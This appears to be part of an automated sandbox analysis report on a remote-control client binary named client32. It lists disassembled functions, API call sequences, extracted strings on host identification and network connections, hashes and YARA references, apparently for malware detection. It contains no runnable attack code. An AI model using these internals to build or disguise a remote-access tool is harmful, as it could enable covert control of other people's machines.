                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$358075$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                    • API String ID: 3802068140-3447039090
                                                                                                                                                    • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                                                                                    • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                                                                    • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                                                                                    • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                                                                                                    Function 6CA93D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1833 6ca93d00-6ca93d42 _memset call 6ca93b80 1835 6ca93d47-6ca93d4f 1833->1835 1836 6ca93d6c-6ca93d6e 1835->1836 1837 6ca93d51-6ca93d6b call 6caa28e1 1835->1837 1839 6ca93d70-6ca93d84 call 6ca86f50 1836->1839 1840 6ca93d87-6ca93da1 call 6ca88fb0 1836->1840 1839->1840 1846 6ca93da3-6ca93dc4 call 6ca863c0 call 6caa28e1 1840->1846 1847 6ca93dc5-6ca93e44 call 6ca85e90 * 2 call 6ca97be0 call 6ca85e20 lstrlenA 1840->1847 1860 6ca93e98-6ca93fbe call 6ca85500 call 6ca86050 call 6ca97c70 * 2 call 6ca97d00 * 3 call 6ca85060 call 6ca97d00 _free call 6ca97d00 gethostname call 6ca97d00 call 6ca8b8e0 1847->1860 1861 6ca93e46-6ca93e95 call 6ca9d8b0 call 6ca85060 call 6ca84830 _free 1847->1861 1892 6ca93fc0 1860->1892 1893 6ca93fc5-6ca93fe1 call 6ca97d00 1860->1893 1861->1860 1892->1893 1896 6ca93ff8-6ca93ffe 1893->1896 1897 6ca93fe3-6ca93ff5 call 6ca97d00 1893->1897 1899 6ca9421a-6ca94263 call 6ca97b60 _free call 6ca898d0 call 6ca977e0 1896->1899 1900 6ca94004-6ca94022 call 6ca85e20 1896->1900 1897->1896 1919 6ca94292-6ca942aa call 6caa28e1 1899->1919 1920 6ca94265-6ca94291 call 6ca8a4e0 call 6caa28e1 1899->1920 1906 6ca9405a-6ca94084 call 6ca85e20 1900->1906 1907 6ca94024-6ca94057 call 6ca85060 call 6ca97d00 _free 1900->1907 1917 6ca9408a-6ca941ce call 6ca85060 call 6ca97d00 _free call 6ca85e20 call 6ca85060 call 6ca97d00 _free call 6ca85e20 call 6ca85060 call 6ca97d00 _free call 6ca85e20 call 6ca85060 call 6ca97d00 _free 1906->1917 1918 6ca941d1-6ca94217 call 6ca97d00 call 6ca85e20 call 6ca97d00 1906->1918 1907->1906 1917->1918 1918->1899
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: *Dept$*Gsk$1.1$358075$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                    • API String ID: 2102423945-705461076
                                                                                                                                                    • Opcode ID: 72327b98e1cfba3611f9f14ff40da23a170db099132e41daf5e4412042693630
                                                                                                                                                    • Instruction ID: 34beba2e2b51979f3aa8b190ae460c1672ea9abd41de1cd7d58ffbf651acdbda
                                                                                                                                                    • Opcode Fuzzy Hash: 72327b98e1cfba3611f9f14ff40da23a170db099132e41daf5e4412042693630
                                                                                                                                                    • Instruction Fuzzy Hash: 1EE183B291121CABDB24DB64CD81EEF77B8AF44205F0045D9E609A7A41DB349BCD8FB1
                                                                                                                                                    Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1956 11144140-11144181 GetModuleFileNameA 1957 111441c3 1956->1957 1958 11144183-11144196 call 11081e00 1956->1958 1960 111441c9-111441cd 1957->1960 1958->1957 1964 11144198-111441c1 LoadLibraryA 1958->1964 1962 111441cf-111441dc LoadLibraryA 1960->1962 1963 111441e9-11144207 GetModuleHandleA GetProcAddress 1960->1963 1962->1963 1965 111441de-111441e6 LoadLibraryA 1962->1965 1966 11144217-11144240 GetProcAddress * 4 1963->1966 1967 11144209-11144215 1963->1967 1964->1960 1965->1963 1968 11144243-111442bb GetProcAddress * 10 call 11162bb7 1966->1968 1967->1968 1970 111442c0-111442c3 1968->1970
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 11144173
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                    • API String ID: 3874234733-2061581830
                                                                                                                                                    • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                                                    • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                                                                    • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                                                    • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                                                                                    Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2056 110aa170-110aa1d2 LoadLibraryA GetProcAddress 2057 110aa1d8-110aa1e9 SetupDiGetClassDevsA 2056->2057 2058 110aa2e5-110aa2ed SetLastError 2056->2058 2059 110aa1ef-110aa1fd 2057->2059 2060 110aa3f3-110aa3f5 2057->2060 2064 110aa2f9-110aa2fb SetLastError 2058->2064 2061 110aa200-110aa204 2059->2061 2062 110aa3fe-110aa400 2060->2062 2063 110aa3f7-110aa3f8 FreeLibrary 2060->2063 2065 110aa21d-110aa235 2061->2065 2066 110aa206-110aa217 GetProcAddress 2061->2066 2067 110aa417-110aa432 call 11162bb7 2062->2067 2063->2062 2068 110aa301-110aa30c GetLastError 2064->2068 2065->2068 2079 110aa23b-110aa23d 2065->2079 2066->2064 2066->2065 2070 110aa312-110aa31d call 11163aa5 2068->2070 2071 110aa3a0-110aa3b1 GetProcAddress 2068->2071 2070->2061 2072 110aa3bb-110aa3bd SetLastError 2071->2072 2073 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 2071->2073 2078 110aa3c3-110aa3c5 2072->2078 2073->2078 2078->2060 2080 110aa3c7-110aa3e9 CreateFileA 2078->2080 2081 110aa248-110aa24a 2079->2081 2082 110aa23f-110aa245 call 11163aa5 2079->2082 2083 110aa3eb-110aa3f0 call 11163aa5 2080->2083 2084 110aa402-110aa40c call 11163aa5 2080->2084 2086 110aa24c-110aa25f GetProcAddress 2081->2086 2087 110aa265-110aa27b 2081->2087 2082->2081 2083->2060 2096 110aa40e-110aa40f FreeLibrary 2084->2096 2097 110aa415 2084->2097 2086->2087 2090 110aa322-110aa32a SetLastError 2086->2090 2092 110aa27d-110aa286 GetLastError 2087->2092 2098 110aa28c-110aa29f call 11163a11 2087->2098 2090->2092 2092->2098 2099 110aa361-110aa372 call 110aa110 2092->2099 2096->2097 2097->2067 2104 110aa382-110aa393 call 110aa110 2098->2104 2105 110aa2a5-110aa2ad 2098->2105 2106 110aa37b-110aa37d 2099->2106 2107 110aa374-110aa375 FreeLibrary 2099->2107 2104->2106 2113 110aa395-110aa39e FreeLibrary 2104->2113 2108 110aa2af-110aa2c2 GetProcAddress 2105->2108 2109 110aa2c4-110aa2db 2105->2109 2106->2067 2107->2106 2108->2109 2112 110aa32f-110aa331 SetLastError 2108->2112 2114 110aa337-110aa351 call 110aa110 call 11163aa5 2109->2114 2117 110aa2dd-110aa2e0 2109->2117 2112->2114 2113->2067 2114->2106 2121 110aa353-110aa35c FreeLibrary 2114->2121 2117->2061 2121->2067
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(setupapi.dll,1EF76653,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                                                                                    • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                                                                                    • _free.LIBCMT ref: 110AA240
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                                                                                    • GetLastError.KERNEL32 ref: 110AA27D
                                                                                                                                                    • _malloc.LIBCMT ref: 110AA293
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                                                                                    • GetLastError.KERNEL32 ref: 110AA301
                                                                                                                                                    • _free.LIBCMT ref: 110AA313
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                                                                                    • _free.LIBCMT ref: 110AA344
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                                                                    • API String ID: 3464732724-3340099623
                                                                                                                                                    • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                                                                                    • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                                                                                    • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                                                                                    • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                                                                                                    Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2394 1102e199 2395 1102e1a0-1102e1b1 2394->2395 2395->2395 2396 1102e1b3 2395->2396 2397 1102e2f4-1102e30d call 11143690 2396->2397 2400 1102e313-1102e315 2397->2400 2401 1102e190-1102e193 2397->2401 2402 1102e413-1102e42d call 11146fe0 2400->2402 2403 1102e31b-1102e321 2400->2403 2404 1102e195-1102e197 2401->2404 2405 1102e1b8-1102e1c1 2401->2405 2429 1102e483-1102e48f call 1102bc40 2402->2429 2430 1102e42f-1102e448 call 1105e820 2402->2430 2407 1102e323-1102e332 call 11145990 2403->2407 2408 1102e338-1102e348 2403->2408 2404->2395 2405->2397 2409 1102e1c7-1102e1ce 2405->2409 2407->2408 2412 1102e34a 2408->2412 2413 1102e34f-1102e36d call 1102d360 2408->2413 2409->2397 2414 1102e2c3-1102e2d8 call 11163ca7 2409->2414 2415 1102e1d5-1102e1d7 2409->2415 2416 1102e2da-1102e2ef call 11163ca7 2409->2416 2417 1102e26a-1102e29d call 11162777 call 11142e60 2409->2417 2418 1102e2ab-1102e2c1 call 11164ed0 2409->2418 2419 1102e25b-1102e265 2409->2419 2420 1102e29f-1102e2a9 2409->2420 2421 1102e21c-1102e222 2409->2421 2422 1102e24c-1102e256 2409->2422 2412->2413 2413->2402 2444 1102e373-1102e398 call 110b7df0 call 11147060 2413->2444 2414->2397 2415->2397 2428 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2415->2428 2416->2397 2417->2397 2418->2397 2419->2397 2420->2397 2431 1102e224-1102e238 call 11163ca7 2421->2431 2432 1102e23d-1102e247 2421->2432 2422->2397 2428->2397 2453 1102e491-1102e498 2429->2453 2454 1102e468-1102e46f 2429->2454 2430->2429 2451 1102e44a-1102e45c 2430->2451 2431->2397 2432->2397 2480 1102e3a3-1102e3a9 2444->2480 2481 1102e39a-1102e3a1 2444->2481 2451->2429 2472 1102e45e 2451->2472 2457 1102e475-1102e478 2453->2457 2459 1102e49a-1102e4a4 2453->2459 2454->2457 2458 1102e67a-1102e69b GetComputerNameA 2454->2458 2465 1102e47a-1102e481 call 110b7df0 2457->2465 2466 1102e4a9 2457->2466 2460 1102e6d3-1102e6d9 2458->2460 2461 1102e69d-1102e6d1 call 11028230 2458->2461 2459->2458 2468 1102e6db-1102e6e0 2460->2468 2469 1102e70f-1102e722 call 11164ed0 2460->2469 2461->2460 2498 1102e727-1102e733 2461->2498 2474 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2465->2474 2466->2474 2477 1102e6e6-1102e6ea 2468->2477 2489 1102e917-1102e93a 2469->2489 2472->2454 2530 1102e64a-1102e652 SetLastError 2474->2530 2531 1102e58c-1102e5a3 2474->2531 2484 1102e706-1102e708 2477->2484 2485 1102e6ec-1102e6ee 2477->2485 2487 1102e3ab-1102e3b2 call 11028360 2480->2487 2488 1102e409 2480->2488 2481->2402 2495 1102e70b-1102e70d 2484->2495 2493 1102e702-1102e704 2485->2493 2494 1102e6f0-1102e6f6 2485->2494 2487->2488 2502 1102e3b4-1102e3e6 2487->2502 2488->2402 2507 1102e962-1102e96a 2489->2507 2508 1102e93c-1102e942 2489->2508 2493->2495 2494->2484 2499 1102e6f8-1102e700 2494->2499 2495->2469 2495->2498 2500 1102e735-1102e74a call 110b7df0 call 1102a1f0 2498->2500 2501 1102e74c-1102e75f call 11081d30 2498->2501 2499->2477 2499->2493 2537 1102e7a3-1102e7bc call 11081d30 2500->2537 2521 1102e761-1102e784 2501->2521 2522 1102e786-1102e788 2501->2522 2517 1102e3f0-1102e3ff call 110f64d0 2502->2517 2518 1102e3e8-1102e3ee 2502->2518 2515 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2507->2515 2516 1102e96c-1102e979 call 11036710 call 11162777 2507->2516 2508->2507 2512 1102e944-1102e95d call 1102d900 2508->2512 2512->2507 2516->2515 2527 1102e402-1102e404 call 1102d900 2517->2527 2518->2517 2518->2527 2521->2537 2533 1102e790-1102e7a1 2522->2533 2527->2488 2539 1102e613-1102e61f 2530->2539 2531->2539 2550 1102e5a5-1102e5ae 2531->2550 2533->2533 2533->2537 2554 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2537->2554 2555 1102e8fc-1102e909 call 11164ed0 2537->2555 2543 1102e662-1102e671 2539->2543 2544 1102e621-1102e62d 2539->2544 2543->2458 2553 1102e673-1102e674 FreeLibrary 2543->2553 2551 1102e63f-1102e643 2544->2551 2552 1102e62f-1102e63d GetProcAddress 2544->2552 2550->2539 2559 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2550->2559 2557 1102e654-1102e656 SetLastError 2551->2557 2558 1102e645-1102e648 2551->2558 2552->2551 2553->2458 2594 1102e853-1102e869 call 11129e00 2554->2594 2595 1102e83f-1102e84e call 11029a70 2554->2595 2571 1102e90c-1102e911 CharUpperA 2555->2571 2564 1102e65c 2557->2564 2558->2564 2559->2539 2579 1102e5e8-1102e60e call 11147060 call 11027f80 2559->2579 2564->2543 2571->2489 2579->2539 2599 1102e882-1102e8bc call 110d0e20 * 2 2594->2599 2600 1102e86b-1102e87d call 110d0e20 2594->2600 2595->2594 2607 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2599->2607 2608 1102e8be-1102e8cd call 11029a70 2599->2608 2600->2599 2607->2571 2608->2607
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: $18/11/16 11:28:14 V12.10F20$358075$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                    • API String ID: 1029625771-4035218665
                                                                                                                                                    • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                                                                    • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                                                                    • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
